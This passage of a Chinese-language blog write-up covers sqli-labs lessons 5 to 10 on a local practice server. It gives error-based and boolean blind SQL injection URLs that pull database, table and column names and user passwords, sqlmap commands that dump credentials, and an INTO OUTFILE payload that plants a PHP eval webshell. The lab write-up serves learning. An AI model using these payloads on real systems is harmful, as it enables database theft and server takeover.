<li>继续爆其他数据库名，改变<code>limit n,1</code>即可：<code>http://localhost:8088/sqlilabs/Less-5/?id=2&#39; and (select 1 from (select count(*),concat((select concat(schema_name,&#39;;&#39;) from information_schema.schemata limit 1,1),floor(rand()*2)) as x from information_schema.tables group by x) as a) --+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-460c01c27eb98790.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-4ea25bf838a64d21.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-6aeb02565c36cd2a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-59bee5851f4dbcd8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-aff665d270bc3f80.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br>当显示下面的情况时，说明已经爆完。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-8cad0ada3774ffcd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>爆<code>security</code>数据库中的表：<br>构造：<code>http://localhost:8088/sqlilabs/Less-5/?id=2&#39; and (select 1 from (select count(*),concat((select concat(table_name,&#39;;&#39;) from information_schema.tables where table_schema=&#39;security&#39; limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a) --+</code> 还是更换<code>limit n,1</code>一个一个爆出。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-e9c8a90dfa7ca42c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-d5f430ac92482178.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-b9d825cb3ab27ceb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-f27b2c187e38b116.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br>下面说明已经爆完，同上。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-8cad0ada3774ffcd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li><p>爆<code>users</code>表的列名：<code>http://localhost:8088/sqlilabs/Less-5/?id=2&#39; and (select 1 from (select count(*),concat((select concat(column_name,&#39;;&#39;) from information_schema.columns where table_name=&#39;users&#39; limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-94c03d58f0da40b6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-7197704c33c3bb43.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-8f09352e40d5b077.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
</li>
<li><p>爆<code>users</code>表中的内容:<br>用户名和密码为，同样，<code>limit n,1</code>慢慢来吧：<code>http://localhost:8088/sqlilabs/Less-5/?id=2&#39; and(select 1 from (select count(*),concat((select concat(username,&#39;: &#39;,password,&#39;;&#39;) from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)--+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-31736b8a5e25386d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-5439bda9c9db9fa5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
</li>
</ol>
<p>太多了，就不一一列举了。</p>
<hr>
<h3 id="Less-6"><a href="#Less-6" class="headerlink" title="Less-6"></a>Less-6</h3><ol>
<li>加单引号，正常，加双引号，报错如下：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-12853a07376ae79d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>可知为闭合双引号出错，构造方法同上，这里尝试使用布尔型盲注：</li>
<li>先看数据库的版本， <code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and 1=(if(substr(version(),1,1)=5,1,0))--+</code> 显示正常，说明数据库版面为5，就可以利用那个默认库information_schema了。</li>
<li>猜测数据库名，使用二分法。</li>
</ol>
<ul>
<li>构造<code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and substr(database(),1,1)&gt;&#39;a&#39;--</code> 没报错，说明数据库名第一个大于<code>a</code>。</li>
<li>接着，构造为：<code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and substr(database(),1,1)&gt;&#39;m&#39;--+</code> 还是正常的，继续。</li>
<li>选取<code>z</code>, <code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and substr(database(),1,1)&gt;&#39;z&#39;--+</code> 出错，无显示。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-583a594a844be6a4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>所有考虑<code>t</code> ,也就是m和z的中间那个。<code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and substr(database(),1,1)&gt;&#39;t&#39;--+</code> 依然出错。</li>
<li>就这样，一步一步试出第一个字母，得出为<code>s</code>。</li>
</ul>
<ol start="5">
<li>下一步，判断其长度：还是二分法，慢慢试，由<code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and length(database())=8--+</code> 访问正常知共有8个字母。然后如上一个一个试，通过<code>substr(database(),n,1)</code>。其实得出前面几个便可猜出为何单词，这里即为<code>security</code>。</li>
<li>下面是猜表名：<code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and substr((select table_name from information_schema.tables where table_schema=&#39;security&#39; limit 3,1),1,1)=&#39;u&#39; --+</code></li>
</ol>
<ul>
<li>这里工作量更大了，因为security中有四张表，每张都有id属性，下面设为<code>limit 3,1</code>,猜测表<code>users</code>的第一个字母<code>u</code>时才不会出错(还有第三张表<code>uagents</code> 即<code>limit 2,1</code>时猜测时也不会出错,所以得试好多次) </li>
<li>当然，一般我们需要的应该都是users表，所以也可以直接尝试<code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and substr((select table_name from information_schema.tables where table_schema=&#39;security&#39; limit 3,1),1,5)=&#39;users&#39; --+</code> </li>
</ul>
<ol start="7">
<li>接着是列：构造类似，不一一说明：</li>
</ol>
<ul>
<li>第一个属性为<code>id</code> ，已知</li>
<li>第二个<code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and substr((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 1,1),1,8)=&#39;username&#39; --+</code>为<code>username</code></li>
<li>第三个为：<code>http://localhost:8088/sqlilabs/Less-6/?id=1&quot; and substr((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 2,1),1,8)=&#39;password&#39; --+</code> 为<code>password</code></li>
</ul>
<ol start="8">
<li>最后是内容：这就更复杂了，因为每个字母都需要猜，实际工作量是非常大的，由于目前水平有限，语句的构造和注入方法都是比较愚笨的，还不知道其他更好的方法，所以就先到这里了。</li>
</ol>
<hr>
<h3 id="Less-7"><a href="#Less-7" class="headerlink" title="Less-7"></a>Less-7</h3><ol>
<li>加单引号出现错误， 可以猜测 id 是一个单引号包裹的字符类型。但这样<code>http://localhost:8088/sqlilabs/Less-7/?id=1&#39; --+</code>却是错的，所以考虑到可能有<code>)</code>,于是<code>http://localhost:8088/sqlilabs/Less-7/?id=1&#39;) --+</code> 还是错的，差点放弃了，最后得出<code>http://localhost:8088/sqlilabs/Less-7/?id=1&#39;)) --+</code>是正确的，所以可以这样构造攻击语句 <code>&#39;)) 攻击代码--+</code></li>
<li>通过group by 得知有三列。</li>
<li>由于本关卡提示使用file权限向服务器写入文件，先查看是否有写入权限。<br><code>http://localhost:8088/sqlilabs/Less-7/?id=1&#39;)) and (select count(*) from mysql.user)&gt;0--+</code> 返回正常，说明有写入权限。</li>
<li>试写入一个文件试试：<code>http://localhost:8088/sqlilabs/Less-7/?id=-1&#39;)) union select 1,2,3 into outfile &quot;F:\\tool\\phpstudy\\PHPTutorial\\WWW\\sqlilabs\\Less-7\\try.php&quot;--+</code> 成功。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-54d1a6a6fc790c81.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ol>
<p>注：有可能遇到<a href="https://www.jb51.net/article/125905.htm" target="_blank" rel="noopener">遇到secure-file-priv问题</a> ，自己设置一下就好了。</p>
<ol start="5">
<li>现在写入webshell，<code>http://localhost:8088/sqlilabs/Less-7/?id=-1&#39;)) union select 1,2,&quot;&lt;?php @eval($_POST[&#39;sql&#39;]);?&gt;&quot; into outfile &quot;F:\\tool\\phpstudy\\PHPTutorial\\WWW\\sqlilabs\\Less-7\\try1.php&quot;--+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-57260168646d97f2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>使用菜刀连接下：成功<br><img src="https://upload-images.jianshu.io/upload_images/9216631-4accd17dfa12b9d7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ol>
<hr>
<h3 id="Less-8"><a href="#Less-8" class="headerlink" title="Less-8"></a>Less-8</h3><ol>
<li>加单引号，出错，加注释<code>http://localhost:8088/sqlilabs/Less-8/?id=1&#39; --+</code> 正常。可知为单引号闭合。</li>
<li>接下来和<code>Less-5</code>差不多，就是不能基于报错型盲注。因为没有回显内容，所以只能用布尔型盲注和时间延迟型盲注。</li>
<li>这里有个问题，其实在<code>Less-1</code>时就有疑问了，但<code>Less-1</code>有回显报错，所以不在意，到这就又有疑问了，就是当加双引号和注释<code>http://localhost:8088/sqlilabs/Less-8/?id=1&quot; --+</code>和“双引号不加注释”时<code>http://localhost:8088/sqlilabs/Less-8/?id=1&quot;</code>，也是正确的，很奇怪。后来在命令行中尝试了<code>select * from users where id=&#39;1&quot;&#39; limit 0,1;</code> 发现是可以通过的，又尝试了几个情况。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-4068fff492bb2df0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-1830cfc0a1edeceb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br><img src="https://upload-images.jianshu.io/upload_images/9216631-8ec7278bdd9ec84b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ol>
<p>通过上面的尝试发现，加双引号时，加不加注释其实都一样，因为MySQL把一个双引号当成两个单引号了，注释在引号中根本不起作用了，所以才会出现返回正常的情况。</p>
<ol start="4">
<li>和之前所说的一样，使用布尔型盲注和时间延迟型盲注是比较繁琐的，所以直接使用sqlmap进行注入：<br>(1)布尔型盲注</li>
</ol>
<ul>
<li>爆数据库名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql --dbs --batch --threads 10</code></li>
<li>爆表名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql -D security --tables --batch --threads 10</code></li>
<li>爆列名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql -D security -T users --column --batch --threads 10</code></li>
<li>爆内容：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql -D security -T users -C username,password --dump --batch --threads 10</code><br>(2)时间延迟型盲注（真难等）</li>
<li>爆数据库名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql --dbs --batch</code></li>
<li>爆表名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql -D security --tables --batch</code></li>
<li>爆列名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql -D security -T users --column --batch</code></li>
<li>爆内容：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql -D security -T users -C username,password --dump --batch</code></li>
</ul>
<hr>
<h3 id="Less-9"><a href="#Less-9" class="headerlink" title="Less-9"></a>Less-9</h3><ol>
<li>尝试使用单引号和双引号闭合（没有注释<code>--+</code>），发现页面回显一直正常，好迷。网上说把单双引号给退意了，不懂。</li>
<li>根据提示，为单引号时间延迟型盲注。</li>
<li>但感觉好像加什么都显示正常，不管了，直接用sqlmap跑吧。</li>
</ol>
<ul>
<li>爆数据库名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql --dbs --batch</code></li>
<li>爆表名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql -D security --tables --batch</code></li>
<li>爆列名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql -D security -T users --column --batch</code></li>
<li>爆内容：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql -D security -T users -C username,password --dump --batch</code></li>
</ul>
<hr>
<h3 id="Less-10"><a href="#Less-10" class="headerlink" title="Less-10"></a>Less-10</h3><ol>
<li>和Less-9一样，感觉输入什么都没有反应。</li>
<li>根据提示，为双引号时间延迟型盲注。</li>
<li>也是用sqlmap跑，就不多说了。</li>
</ol>
<hr>
<h3 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h3><blockquote>
<ol>
<li><a href="http://iv4n.xyz/sqli/" target="_blank" rel="noopener">MySql DB Sql注入</a></li>
<li><a href="https://baijiahao.baidu.com/s?id=1595349117525189591&amp;wfr=spider&amp;for=pc" target="_blank" rel="noopener">concat(),concat_ws()与及group_concat()的用法</a></li>
<li><a href="https://www.cnblogs.com/ichunqiu/p/5805108.html" target="_blank" rel="noopener">11种常见SQLMAP使用方法详解</a></li>
<li><a href="https://blog.csdn.net/Leep0rt/article/details/78556440" target="_blank" rel="noopener">详细讲解双查询注入</a></li>
<li><a href="https://www.cnblogs.com/peterpan0707007/p/7620048.html" target="_blank" rel="noopener">sqli-labs Less(1-35) 小结</a></li>
<li><a href="https://www.cnblogs.com/sutdy/p/8724426.html" target="_blank" rel="noopener">基于时间型盲注和基于布尔型盲注</a></li>
</ol>
</blockquote>
<hr>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    lei
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://clwsec.top/2019/03/07/sqli-labs-Less1-10/" title="Sqli-Labs-Less1-10">https://clwsec.top/2019/03/07/sqli-labs-Less1-10/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sqli-labs/" rel="tag"> <i class="fa fa-tag"></i> sqli-labs</a>
          
            <a href="/tags/SQL注入/" rel="tag"> <i class="fa fa-tag"></i> SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/06/Python使用技巧/" rel="next" title="Python使用技巧">
                <i class="fa fa-chevron-left"></i> Python使用技巧
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/08/MySQL常用命令/" rel="prev" title="MySQL常用命令">
                MySQL常用命令 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC80MzA3Ni8xOTYyMg=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="lei">
            
              <p class="site-author-name" itemprop="name">lei</p>
              <p class="site-description motion-element" itemprop="description">业精于勤 荒于嬉 行成于思 毁于随</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/clwsec" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="email:clwsec@163.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.jianshu.com/u/7e18a3f52ba3" target="_blank" title="简书">
                      
                        <i class="fa fa-fw fa-heartbeat"></i>简书</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="qq:740455490" target="_blank" title="QQ">
                      
                        <i class="fa fa-fw fa-qq"></i>QQ</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-globe"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.baidu.com/" title="百度" target="_blank">百度</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhihu.com/" title="知乎" target="_blank">知乎</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.runoob.com/" title="菜鸟" target="_blank">菜鸟</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.w3school.com.cn/" title="W3school" target="_blank">W3school</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#做题过程中的各种知识"><span class="nav-number">2.</span> <span class="nav-text">做题过程中的各种知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-1"><span class="nav-number">3.</span> <span class="nav-text">Less-1</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#手工UNION联合查询注入"><span class="nav-number">3.1.</span> <span class="nav-text">手工UNION联合查询注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用sqlmap工具进行注入"><span class="nav-number">3.2.</span> <span class="nav-text">使用sqlmap工具进行注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-2"><span class="nav-number">4.</span> <span class="nav-text">Less-2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-3"><span class="nav-number">5.</span> <span class="nav-text">Less-3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-4"><span class="nav-number">6.</span> <span class="nav-text">Less-4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-5"><span class="nav-number">7.</span> <span class="nav-text">Less-5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-6"><span class="nav-number">8.</span> <span class="nav-text">Less-6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-7"><span class="nav-number">9.</span> <span class="nav-text">Less-7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-8"><span class="nav-number">10.</span> <span class="nav-text">Less-8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-9"><span class="nav-number">11.</span> <span class="nav-text">Less-9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-10"><span class="nav-number">12.</span> <span class="nav-text">Less-10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参考："><span class="nav-number">13.</span> <span class="nav-text">参考：</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-snowflake-o"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lei</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">21.5k</span>
  
</div>







        
<div class="busuanzi-count">
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 访问总量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("G6dqnRdCxLa2gzB6qMGY7QCL-gzGzoHsz", "cEc5NtouoT5gS22x2xD9CUnO");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  
  


  

  

</body>
</html>
